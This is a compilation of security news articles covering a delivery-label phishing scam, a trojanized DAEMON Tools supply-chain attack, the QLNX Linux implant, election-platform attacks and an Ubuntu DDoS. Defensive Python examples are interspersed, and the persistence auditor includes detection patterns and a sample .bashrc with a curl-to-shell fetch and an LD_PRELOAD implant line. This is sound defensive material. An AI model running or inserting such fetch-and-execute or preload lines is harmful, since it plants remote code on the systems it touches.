
Delivery-Label Scam: How Amazon & Flipkart Boxes Can Steal Your Data

 

Scammers are exploiting discarded delivery boxes from Amazon and Flipkart to harvest personal information and launch sophisticated phishing attacks, so shoppers need to treat packaging as sensitive data rather than trash. Labels on parcels often include names, phone numbers, addresses and sometimes order details, which fraudsters collect from bins or common disposal areas and then use to make their outreach appear legitimate. 

The attack begins with a simple, low-tech step: gathering boxes with intact shipping labels. Criminals extract the printed information and then contact the recipient posing as customer-care or rewards agents, leveraging the accurate personal details to build trust quickly. Because the caller or message can reference the victim’s real name, number, and recent purchase, targets are more likely to engage and follow instructions, which typically include clicking a link or sharing an OTP to “confirm” a cashback, refund, or prize. 

Clicking the supplied link or following caller instructions is where the compromise happens. Victims are often led to phishing pages or prompted to install malicious apps that capture credentials, banking details, and OTPs, or to enter payment information directly on fake forms; these steps can lead to immediate financial loss and longer-term account takeover. Scammers sometimes combine this with social-engineering scripts—urgent tones, limited-time offers, or threats of cancelled orders—to pressure victims into acting without verification. 

Safety tips 

Protection is straightforward but requires habit change. Before discarding any parcel, remove or destroy the shipping label—tear it off, shred it, black it out with a permanent marker, or use an identity-protection roller stamp to obscure personal data. Never click links or install apps sent by unknown numbers, and verify any unexpected offers or refund requests directly through the official Amazon or Flipkart apps or websites rather than through messages or calls. Treat unsolicited calls that reference personal order details with skepticism, and never share OTPs, passwords, or bank information even when the caller appears informed. 

This scam becomes especially active around big sale events when large volumes of deliveries increase the supply of labelled packaging and scammers’ opportunities to find usable targets. A few seconds spent removing labels and a little caution with links and calls can block an easy avenue criminals use to convert harmless cardboard into a source of identity theft and financial fraud.

4 Key Areas in 2026 for Organisation Safety Against Advanced AI Threats

2026 has not been a kind year to cybersecurity, as organizations and industries globally have been hit by ruthless cyberattacks. 

2026 and cybersecurity

Cybersecurity entered 2026 under pressure to deploy AI technology while laying the foundations for a quantum future. Security teams must defend against advanced AI-driven and hybrid attacks while facing talent scarcity, a rapidly shifting threat landscape, and rising operational challenges.

It is the first time that hackers have access to the same advanced enterprise-level tech that security experts are using to defend their digital assets.

Is the convergence good or bad?

Organizations need the transformational advantage that quantum computing promises; however, it also threatens the cryptographic infrastructure that protects today’s digital world. Worse, cyber attackers are pooling their efforts and outpacing defenders.

Like defenders, threat actors are willing to play the long game: they gain initial access and stay hidden inside systems for long periods. When the right opportunity arrives, they move laterally and steal important data, disrupting operations, causing financial damage, and tarnishing reputations.

So, what are these four key areas that businesses and users need to address or stay safe from?

1. System and skills problem

According to the ISC2 2025 report, 69% of respondents suffered multiple cybersecurity breaches due to skills gaps. These gaps stem from factors such as budget constraints, misalignment with academia, and high enterprise demand.

2. Bug management shift to active exposure reduction

Hackers use GenAI to advance and scale their attacks and to evade security teams. The reactive patch cycle delays response times and provides only baseline protection. What businesses need today is a Continuous Threat Exposure Management (CTEM) approach that offers real-time visibility before flaws can be exploited, but its success depends on AI-based risk prioritization.

3. Advanced deepfake protection is the need of the hour

Reliability is the new attack vector. Deepfakes have plagued every digital aspect of human life. Traditional measures fail to detect AI-generated content, so AI-based protection is needed. Adaptive deepfake-detection systems can be built into identity workflows and respond immediately to threats, flagging malicious activity and capturing attacks with detailed metadata for research and audit work.

4. Post-quantum protection 

Quantum computing is making strides toward practical use; a sufficiently advanced system could break public-key cryptosystems such as RSA, and attackers could exploit that in ransomware attacks that extort millions. Hackers are already using the “harvest now, decrypt later” approach, stealing encrypted data today so that it can be decrypted later.

Thus, the National Institute of Standards and Technology (NIST) has advised organizations to adopt post-quantum cryptography (PQC) and to track their quantum-vulnerable assets.
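The inventory-and-prioritization step that point 4 calls for, as an added illustration that is not NIST's or the article's own code: each asset is bucketed by algorithm and scored with Mosca's inequality (migration time X plus secrecy lifetime Y exceeding the years Z until a cryptographically relevant quantum computer), so "harvest now, decrypt later" exposure drives the migration order. The asset records and the ten-year Z value are constructed assumptions.

```python
"""Inventory of cryptographic assets scored for 'harvest now, decrypt later' exposure.
Added illustration; not NIST's or the author's code. Asset records and the
years-to-quantum estimate are constructed assumptions."""
from dataclasses import dataclass

# Public-key algorithms a cryptographically relevant quantum computer (CRQC) breaks
# with Shor's algorithm, versus the NIST post-quantum standards that replace them.
QUANTUM_VULNERABLE = {"RSA", "DSA", "DH", "ECDSA", "ECDH", "X25519", "ED25519"}
PQC_STANDARDS = {"ML-KEM", "ML-DSA", "SLH-DSA"}


@dataclass
class Asset:
    name: str
    algorithm: str
    secrecy_years: int      # Y: how long the protected data must remain confidential
    migration_years: float  # X: estimated effort to move this asset to PQC


def classify(asset: Asset) -> str:
    """Bucket an asset by the quantum status of its algorithm."""
    alg = asset.algorithm.upper()
    if alg in PQC_STANDARDS:
        return "pqc"
    if alg in QUANTUM_VULNERABLE:
        return "quantum-vulnerable"
    if alg.startswith("AES") or alg.startswith("CHACHA"):
        return "symmetric"  # Grover only halves effective key length; 256-bit keys hold
    return "unknown"


def hndl_exposed(asset: Asset, years_to_crqc: float) -> bool:
    """Mosca's inequality: data is exposed to harvest-now-decrypt-later when
    X + Y > Z, i.e. it must still be secret after a CRQC arrives (Z years out)
    and before this asset has been migrated (X years from now)."""
    if classify(asset) != "quantum-vulnerable":
        return False
    return asset.migration_years + asset.secrecy_years > years_to_crqc


def prioritize(assets: list[Asset], years_to_crqc: float) -> list[str]:
    """Names of exposed assets, largest overshoot of Z first."""
    exposed = [a for a in assets if hndl_exposed(a, years_to_crqc)]
    exposed.sort(key=lambda a: a.migration_years + a.secrecy_years, reverse=True)
    return [a.name for a in exposed]


# Constructed inventory; Z = 10 years is an assumption, not a forecast.
SAMPLE_ASSETS = [
    Asset("vpn-gateway", "RSA", secrecy_years=9, migration_years=2),
    Asset("hr-records-archive", "ECDH", secrecy_years=25, migration_years=3),
    Asset("public-website-tls", "ECDSA", secrecy_years=0, migration_years=1),
    Asset("new-api-kem", "ML-KEM", secrecy_years=20, migration_years=0),
    Asset("backup-encryption", "AES-256", secrecy_years=30, migration_years=0),
]
YEARS_TO_CRQC = 10

if __name__ == "__main__":
    for name in prioritize(SAMPLE_ASSETS, YEARS_TO_CRQC):
        print("migrate first:", name)
```

Note that the ECDSA-only website is not flagged: signatures protect authenticity at the moment of use, so recorded traffic gains nothing from breaking them later, whereas the ECDH key exchange guarding long-lived records is the classic harvest target.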

Trojanized DAEMON Tools Used to Deploy Persistent Backdoor Malware


 

A routine software update mechanism was weaponized by attackers to distribute malware through official distribution channels, enabling a stealthy global supply-chain compromise. Legitimate AVB Disc Soft code-signing certificates were used to sign trojanized builds in an operation that remained undetected for nearly a month.

By bypassing conventional trust and endpoint security mechanisms, these malicious packages were able to avoid triggering immediate suspicion. Kaspersky discovered that the campaign began on April 8, 2026, and resulted in thousands of infections in over 100 countries before the breach was detected on May 1, 2026. 

Almost all infections were characterized by reconnaissance malware intended to gather system intelligence and establish persistence. However, a comparatively small number of carefully selected victims received advanced second-stage backdoors, suggesting a targeted attack on Russian, Belarusian, and Thai organizations involved in government, science, retail, and manufacturing.

Multiple core components of DAEMON Tools were modified, including DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe, and malicious functionality was embedded in versions 12.5.0.2421 through 12.5.0.2434, ensuring that execution occurs at startup while maintaining the appearance of legitimate software functionality.

According to the forensic analysis, the attackers had embedded their malicious framework within several trusted DAEMON Tools binaries, including the DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe that can be found within the installation directory of the application. Because the compromised binaries were signed by authentic AVB Disc Soft signing certificates, operating systems and endpoint security products perceived the compromised binaries as trustworthy, reducing the probability of immediate detection. 

Every time the affected binaries execute during system startup, the CRT initialization routine triggers the hidden backdoor functionality, starting a dedicated background thread that quietly establishes outbound communication with attacker-controlled infrastructure.

Throughout the attack, the malware repeatedly sent HTTP GET requests to a typosquatted domain that closely mimicked the legitimate DAEMON Tools download portal, as a method of mixing malicious traffic with expected software communications. According to WHOIS records, the fraudulent domain was registered on March 27, approximately one week before the supply chain intrusion occurred, indicating deliberate preparation of infrastructure prior to the attack by the campaign's operators. 

Based on an analysis of the command-and-control infrastructure, it appeared that compromised systems were able to receive remotely issued shell commands via cmd.exe and PowerShell, which would allow attackers to download and execute additional payloads dynamically. 

PowerShell's WebClient functionality was utilized to retrieve executable files from an Internet server located at 38.180.107[.]76 before silently executing them from temporary system directories and deleting all traces afterwards. In the course of the investigation, envchk.exe, a .NET-based information collector that researchers determined was intended to perform extensive reconnaissance on infected machines, was identified as one of the primary secondary payloads. 

In the malware's source code, embedded Chinese-language strings suggest that the malware's operators are probably Chinese-speaking, but no official affiliation has yet been established for the threat group. This reconnaissance utility collected a broad range of information regarding the host, including MAC addresses, hostnames, DNS domains, installed software inventories, running process lists, system locale configurations, and other host information. 

Following data collection, the collected data is transmitted back to attacker-controlled infrastructure via structured HTTP POST requests, providing the operators with a detailed profile of the compromised environment before deciding whether to escalate the intrusion. Unsuspecting users were infected when they downloaded and installed trojanized yet legitimately signed installers for DAEMON Tools, which executed malicious code contained within trusted application components without the user knowing it. 

After activation, the implanted payload established persistence mechanisms intended to survive reboots, as well as enabled the installation of a covert backdoor capable of communicating with remote attackers when the system is started. 

The command infrastructure was also capable of dynamically delivering additional malware stages based on the victim’s profile and operational significance. The first stage is assessed to have functioned as a reconnaissance-oriented information stealer tasked with gathering system identifiers, including hostnames, MAC addresses, running processes, installed applications, and locale configurations, before transmitting the harvested telemetry to the operators so they could assess the environment and prioritize victims.

After the first-stage profiling phase, the attackers evaluated selected systems for further compromise. Those systems were escalated to a second stage using a lightweight backdoor capable of executing arbitrary commands, downloading files, and running malicious code directly in memory.

The attack on a Russian educational institution was escalated by the attackers by using QUIC RAT, a remote access malware strain capable of supporting a variety of communication protocols, as well as injecting malicious code into legitimate processes so that they could operate stealthily after the compromise. 

Despite being distributed through official channels, the DAEMON Tools breach remained undetected for nearly a month and represents a highly coordinated, technically mature supply-chain intrusion. Organizations with DAEMON Tools installations performed on or after April 8 were advised to conduct extensive threat hunting for abnormal system behavior and unauthorized network activity during the compromise period.
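A triage helper for the two facts a responder would act on from this report, the affected component names and build range given earlier and the April 8 hunt cut-off above, as an added example that is not Kaspersky's or the vendor's code. Versions are compared numerically rather than as strings, and a valid code signature is deliberately not treated as exculpatory, because the trojanized builds were legitimately signed. The endpoint inventory records are constructed.

```python
"""Triage helper for the trojanized DAEMON Tools builds described above.
Added example, not Kaspersky's or the vendor's code; component names, the
version range and the April 8 date come from the report, the inventory is constructed."""
from datetime import date

AFFECTED_FILES = {"DTHelper.exe", "DiscSoftBusServiceLite.exe", "DTShellHlp.exe"}
AFFECTED_LOW, AFFECTED_HIGH = (12, 5, 0, 2421), (12, 5, 0, 2434)  # inclusive
CAMPAIGN_START = date(2026, 4, 8)  # installs on or after this date warrant a hunt


def parse_version(text: str) -> tuple[int, int, int, int]:
    """Numeric 4-tuple so comparison is by component, never by string
    ('12.5.0.243' sorts between the affected bounds as a string but is not in range)."""
    parts = [int(p) for p in text.strip().split(".")]
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"unexpected version format: {text!r}")
    parts += [0] * (4 - len(parts))
    return tuple(parts)


def version_affected(text: str) -> bool:
    try:
        return AFFECTED_LOW <= parse_version(text) <= AFFECTED_HIGH
    except ValueError:
        return False  # unparsable versions are escalated separately by triage()


def triage(record: dict) -> str:
    """Classify one endpoint inventory record.
    affected-build : a listed component at a build in the trojanized range
    hunt           : any DAEMON Tools install in the campaign window, or a version
                     that could not be parsed, so the host needs manual review
    ok             : outside both the version range and the time window
    A valid Authenticode signature is not consulted: the malicious builds carried
    a genuine AVB Disc Soft signature, so it would clear infected hosts."""
    installed = date.fromisoformat(record["installed"])
    try:
        parse_version(record["version"])
    except ValueError:
        return "hunt"
    if record["file"] in AFFECTED_FILES and version_affected(record["version"]):
        return "affected-build"
    if installed >= CAMPAIGN_START:
        return "hunt"
    return "ok"


# Constructed endpoint inventory (host, component, version, install date).
SAMPLE_INVENTORY = [
    {"host": "ws-01", "file": "DTHelper.exe", "version": "12.5.0.2428", "installed": "2026-04-15"},
    {"host": "ws-02", "file": "DTShellHlp.exe", "version": "12.5.0.2420", "installed": "2026-03-30"},
    {"host": "ws-03", "file": "DiscSoftBusServiceLite.exe", "version": "12.5.0.2435", "installed": "2026-04-20"},
    {"host": "ws-04", "file": "DTHelper.exe", "version": "12.5.0.243", "installed": "2026-04-02"},
    {"host": "ws-05", "file": "DTHelper.exe", "version": "n/a", "installed": "2026-04-02"},
]


def triage_all(records=SAMPLE_INVENTORY) -> dict[str, str]:
    return {r["host"]: triage(r) for r in records}


if __name__ == "__main__":
    for host, verdict in triage_all().items():
        print(f"{host}: {verdict}")
```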

Researchers have avoided formally attributing the campaign, but linguistic artifacts embedded in its first stage strongly suggest that Chinese-speaking operators were responsible. Following earlier compromises involving eScan, Notepad++, and CPU-Z, the incident illustrates the rising trend of software supply-chain attacks throughout 2026. Parallel campaigns such as Trivy, Checkmarx, and Glassworm, which target software repositories, development packages, and browser extensions, continue to demonstrate that trusted software ecosystems have become high-value attack surfaces for sophisticated threat groups.

The DAEMON Tools compromise proves that modern supply-chain attacks are not limited to niche targets or underground software ecosystems, but are increasingly exploiting widely used consumer and enterprise applications. The attackers developed their attack strategy by leveraging trusted software certificates and official distribution channels in order to disguise malicious activity as legitimate software behavior while quietly gaining access to potentially high-value environments across multiple countries. 

Security researchers have concluded that organizations must evolve beyond traditional trust-based security models and embrace continuous monitoring, behavioral detection, and software integrity validation practices that will enable them to identify malicious activity, even within applications that appear legitimate and have been signed. This contemporary supply-chain intrusion illustrates how a single compromised software update can quickly escalate into a global cyber risk with far-reaching operational and national security consequences.

Election Commission Says ECINET Withstood Over 68 Lakh Cyberattack Attempts During Poll Counting

 



The Election Commission of India (ECI) said its digital election infrastructure faced more than 68 lakh malicious online hits on the day votes were counted for the recently concluded Assembly elections, with attempts originating from both domestic and overseas sources. According to election officials, the attacks targeted several online systems operated by the Commission, including the public election results portal, but were contained using existing cybersecurity protections.

Officials stated that despite the unusually high volume of hostile traffic, there was no disruption to counting operations or public access to election-related services.

The attacks were directed at ECINET, the Commission’s integrated election management platform that now combines over 40 separate election applications and digital portals into a unified system. The platform is used to manage multiple election-related functions, including monitoring, reporting, voter services, and administrative coordination.

On counting day, May 4, ECINET reportedly processed an average of nearly 3 crore hits every minute. Across all polling phases conducted on April 9, 23, and 29, the platform recorded a total traffic load of 98.3 crore hits, reflecting the scale at which India’s election infrastructure now operates digitally.

The Commission officially launched ECINET in January 2026 after testing its beta version during the Bihar Assembly elections in November 2025. Since then, the application has crossed 10 crore downloads, indicating rapid adoption among election officials, staff, and users accessing poll-related information and services.

Election authorities said the platform played a major operational role during the elections across five states and Union Territories, along with bypolls conducted during the same period. According to officials, ECINET enabled real-time monitoring of election activities, accelerated reporting processes, and improved administrative coordination between different election units. Authorities also said the centralized system helped increase transparency by reducing delays in communication and data sharing.

Cybersecurity analysts have repeatedly warned that election infrastructure has become an increasingly attractive target for malicious cyber activity because such systems process large amounts of real-time public information under intense public scrutiny. During counting periods, election portals often experience massive spikes in traffic as citizens, media organizations, and political workers continuously refresh result dashboards. Security researchers note that these high-traffic periods can also create opportunities for malicious actors to disguise harmful requests within normal user activity.

While the Election Commission did not disclose the technical nature of the 68 lakh malicious hits, such traffic typically includes automated bot requests, denial-of-service attempts, malicious scanning activity, or repeated unauthorized access attempts aimed at slowing systems or overwhelming servers.

The Commission also introduced a new QR code-based photo identity verification system for counting centres during the election process. On counting day alone, more than 3.2 lakh QR codes were generated through ECINET to regulate entry into counting venues. Officials said the system was introduced to ensure that only authorized personnel could enter restricted areas, reducing the possibility of unauthorized access at highly sensitive counting locations.

According to the Commission, this was the first time the QR-based access system had been deployed across all five states and Union Territories simultaneously. The ECI has now decided to adopt the system as a standard security measure for future Lok Sabha and state Assembly elections.

The increasing dependence on centralized digital infrastructure has pushed election management beyond traditional ballot security into the broader domain of cybersecurity, network resilience, identity verification, and real-time system monitoring. As more election operations move onto integrated digital platforms, experts say continuous monitoring and infrastructure hardening will become essential to maintaining uninterrupted electoral processes at national scale.

Quasar Linux Malware Targets Developers in Stealthy Supply Chain Attack

 

A newly discovered Linux implant called Quasar Linux, or QLNX, is a serious threat because it goes after the people and systems that build software. Instead of behaving like ordinary malware, it is designed to quietly take root in developer and DevOps environments, steal valuable credentials, and open the door to supply-chain attacks. 

QLNX is dangerous because it combines several attack techniques in one package. Trend Micro says it can function as a rootkit, a backdoor, and a credential stealer, while also running filelessly, wiping logs, spoofing process names, and removing its original binary from disk to make investigation harder. It also uses multiple persistence methods, including LD_PRELOAD, systemd, crontab, init.d scripts, XDG autostart, and .bashrc injection, so it can keep coming back even if part of it is removed.

The malware’s main prize is access to developer secrets. Researchers say it targets credentials tied to npm, PyPI, GitHub, AWS, Docker, Kubernetes, Terraform, and other tools that are deeply embedded in modern software delivery pipelines. If attackers get those tokens or keys, they can publish malicious packages, tamper with builds, or move from one system into cloud infrastructure and CI/CD environments.

What makes the threat especially troubling is how stealthy it is. Trend Micro found that QLNX can dynamically compile rootkit and PAM backdoor components on the victim host using gcc, which helps it blend in with normal Linux activity. It also harvests clipboard contents, SSH keys, browser profiles, and authentication data, giving attackers a wide view into how developers work and where their secrets are stored.

The broader issue is that developer machines have become high-value targets in the software supply chain. One compromised workstation can expose publishing pipelines, cloud accounts, and internal codebases, so the impact may spread far beyond the original victim. The safest response is to treat developer endpoints like crown-jewel systems: monitor for unusual persistence, restrict secret storage, rotate tokens quickly, and assume a stolen workstation could become the first step in a wider breach.
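The "monitor for unusual persistence" advice above, made concrete for the channels Trend Micro lists (LD_PRELOAD, systemd, crontab, init.d, XDG autostart and .bashrc injection), as an added example that is not Trend Micro's code: a read-only audit that treats any ld.so.preload entry as a finding and flags startup hooks containing downloader-to-shell pipes, inline base64 decoding, payloads under tmpfs or hidden directories, or LD_PRELOAD exports. The indicator patterns are generic and the sample file contents are constructed.

```python
"""Audit the Linux persistence channels the QLNX write-up lists. Added example,
not Trend Micro's code; indicators are generic and the samples are constructed."""
import os
import re

# Where each persistence channel lives; '~' paths are expanded for the current user.
PRELOAD_FILE = "/etc/ld.so.preload"
HOOK_FILES = ["~/.bashrc", "~/.profile", "/etc/crontab", "/etc/rc.local"]
HOOK_DIRS = ["/etc/cron.d", "/etc/init.d", "/etc/xdg/autostart", "~/.config/autostart",
             "/etc/systemd/system", "~/.config/systemd/user"]

# Content that is rarely legitimate in a startup hook: downloaders piped into a shell,
# inline base64 decoding, payloads staged under tmpfs or hidden directories, and
# LD_PRELOAD being set from a shell profile.
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"),
    re.compile(r"\bbase64\s+(-d|--decode)\b"),
    re.compile(r"(?:/tmp|/dev/shm|/var/tmp)/\S+"),
    re.compile(r"/\.[^/\s]+/\S*\.(?:so|sh|bin)\b"),
    re.compile(r"\bLD_PRELOAD="),
]


def audit_preload(content: str) -> list[str]:
    """Every non-comment entry is a finding: ld.so.preload is empty on most hosts."""
    return [l.strip() for l in content.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]


def audit_hook(content: str, source: str) -> list[tuple[str, int, str]]:
    """Return (source, line number, line) for each suspicious non-comment line."""
    hits = []
    for n, line in enumerate(content.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        if any(p.search(line) for p in SUSPICIOUS):
            hits.append((source, n, line.strip()))
    return hits


def audit_host() -> list:
    """Run both checks against the live filesystem, read-only."""
    findings = []
    if os.path.isfile(PRELOAD_FILE):
        with open(PRELOAD_FILE, errors="replace") as f:
            findings += [(PRELOAD_FILE, 0, e) for e in audit_preload(f.read())]
    paths = [os.path.expanduser(p) for p in HOOK_FILES]
    for d in HOOK_DIRS:
        d = os.path.expanduser(d)
        if os.path.isdir(d):
            paths += [os.path.join(d, name) for name in os.listdir(d)]
    for path in paths:
        if not os.path.isfile(path):
            continue
        try:
            with open(path, errors="replace") as f:
                findings += audit_hook(f.read(), path)
        except OSError:
            pass  # unreadable as the current user; run as root for full coverage
    return findings


# Constructed samples: a profile carrying two implants and a crontab with one.
SAMPLE_BASHRC = """# constructed ~/.bashrc
alias ll='ls -la'
export LD_PRELOAD=/home/dev/.cache/.x/libsys.so
curl -s http://203.0.113.10/a | sh
"""
SAMPLE_CRONTAB = """# constructed /etc/crontab
0 5 * * * root /usr/bin/apt-get update
* * * * * dev /dev/shm/.upd >/dev/null 2>&1
"""
SAMPLE_PRELOAD = "/home/dev/.cache/.x/libsys.so\n"

if __name__ == "__main__":
    for finding in audit_host():
        print(*finding)
```

A rootkit that hooks file reads can hide these entries from a live audit, which is why the report's advice also includes comparing against a known-good image and rotating the developer tokens such a host can reach.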

Ubuntu DDoS Attack Disrupts Installs Updates and Canonical Infrastructure

 

A wave of traffic overwhelmed systems, briefly halting downloads, patches, and web resources managed by Canonical - the company responsible for Ubuntu Linux. Outages stretched nearly twenty-four hours, blocking access to essential tools during the incident.

Midway through the disruption, Canonical confirmed issues affecting its online systems, calling them a prolonged international cyber incident. With efforts already underway to bring functions back online, progress reports were expected later via verified sources after conditions improved. 

The impact was not limited to external sites - discussions on unaffiliated Ubuntu message boards pointed to deeper issues. Failures appeared across several core functions: the security API stumbled, repository access broke, installers froze, and package upgrades failed. While the outage lasted, countless machines could neither pull patches nor start clean installs. The ripple spread wider than first assumed.

A claim of responsibility emerged afterward, attributed to an entity calling itself The Islamic Cyber Resistance in Iraq 313 Team. Supposed messages circulated on Telegram suggest they relied on a service named Beemed - one that facilitates distributed denial-of-service attacks - to execute the incident. While details remain sparse, the method points toward accessible cyber tools being leveraged for disruptive purposes. Heavy network floods emerge when tools like Beamed hand out DDoS power to anyone willing to pay, masking harm behind so-called "testing" labels. 

Instead of building safeguards, some misuse these setups to drown web systems in endless data streams. With advertised force climbing toward 3.5 terabits each second, one sees how readily extreme digital pressure becomes a purchasable option. A single flood of fake signals can overwhelm digital infrastructure when launched from countless hijacked gadgets online. 

Such an event forces critical systems to choke on excessive demand, blocking normal access. Real people experience delays or complete service failures as their requests get lost in chaos. Machines turned into unwilling helpers generate relentless noise instead of useful responses. Performance drops sharply once capacity limits are breached without warning. Genuine interactions fade under pressure from artificial congestion. 

Hacking groups usually start by slipping malicious software onto devices, often by exploiting weak credentials rather than strong ones. Compromised machines are then bundled into massive botnets run remotely through online command-and-control servers. These hijacked networks often change hands in hidden online marketplaces; launching short outages is cheap, while heavier assaults require deeper spending.

What follows? Buyers pick time-limited chaos or go all-in for longer surges. Surprisingly, more DDoS attacks happen now due to widespread access to self-running malware that exploits weak device protections across countries. While strong networks may resist some threats, major companies still face interruptions since hackers pair huge bot-driven data floods with focused attack plans.  

The Ubuntu event underscores how fragile key open-source tools have become - tools that developers, businesses, and public agencies depend on worldwide. When update servers or security interfaces go offline briefly, ripple effects follow. Patching halts. System rollouts stall. All of this unfolds while digital attacks are already underway.
